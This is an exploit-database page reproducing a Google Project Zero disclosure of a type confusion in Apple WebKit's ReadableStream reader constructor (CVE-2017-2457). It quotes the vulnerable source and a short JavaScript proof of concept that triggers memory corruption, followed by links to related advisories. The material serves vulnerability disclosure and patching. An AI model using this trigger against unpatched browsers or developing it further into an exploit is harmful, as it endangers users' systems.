Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtGoogle Security Research1337DAY-ID-27514
HistoryApr 05, 2017 - 12:00 a.m.

Apple WebKit 10.0.2(12602.3.12.0.1, r210800) - constructJSReadableStreamDefaultReader Type Confusion

2017-04-0500:00:00
Google Security Research
0day.today
21

0.114 Low

EPSS

Percentile

94.7%

JSON

Exploit for multiple platform in category web applications

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1085
 
EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)
{
    VM& vm = exec.vm();
    auto scope = DECLARE_THROW_SCOPE(vm);
 
    JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));
    if (!stream)
        return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");
 
    JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1
 
    CallData callData;
    CallType callType = getCallData(jsFunction, callData);
    MarkedArgumentBuffer noArguments;
    return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));
}
 
It doesn't check whether |getReader| is callable or not.
 
PoC:
-->
 
let rs = new ReadableStream();
let cons = rs.getReader().constructor;
 
rs.getReader = 0x12345;
new cons(rs);
 
<!--
Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, r210800)
-->

#  0day.today [2018-04-13]  #

Related

ubuntucve 1
debiancve 1
prion 1
packetstorm 1
cve 1
seebug 1
archlinux 1
openvas 2
ubuntu 1
nessus 4
apple 4
gentoo 1
ubuntucve
ubuntucve
CVE-2017-2457
2017-04-01 00:00:00
debiancve
debiancve
CVE-2017-2457
2017-04-02 01:59:00
prion
prion
Memory corruption
2017-04-02 01:59:00
packetstorm
packetstorm
WebKit constructJSReadableStreamDefaultReader Type Confusion
2017-04-09 00:00:00
cve
cve
CVE-2017-2457
2017-04-02 01:59:00
seebug
seebug
WebKit: Type confusion in constructJSReadableStreamDefaultReader(CVE-2017-2457)
2017-04-04 00:00:00
archlinux
archlinux
[ASA-201704-9] webkit2gtk: multiple issues
2017-04-28 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-3257-1)
2017-04-11 00:00:00
Apple Mac OS X Multiple Vulnerabilities (HT207615)
2017-03-31 00:00:00
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-04-10 00:00:00
nessus
nessus
Ubuntu 16.04 LTS : WebKitGTK+ vulnerabilities (USN-3257-1)
2017-04-11 00:00:00
macOS : Apple Safari < 10.1 Multiple Vulnerabilities
2017-04-03 00:00:00
Mac OS X 10.x < 10.12.4 Multiple Vulnerabilities
2017-03-31 00:00:00
apple
apple
About the security content of Safari 10.1 - Apple Support
2017-08-29 02:51:42
About the security content of Safari 10.1
2017-03-27 00:00:00
About the security content of iOS 10.3 - Apple Support
2017-08-01 06:52:17
gentoo
gentoo
WebKitGTK+: Multiple vulnerabilities
2017-06-07 00:00:00

0.114 Low

EPSS

Percentile

94.7%

JSON
Related for 1337DAY-ID-27514
ubuntucve1debiancve1prion1packetstorm1cve1seebug1archlinux1openvas2ubuntu1nessus4apple4gentoo1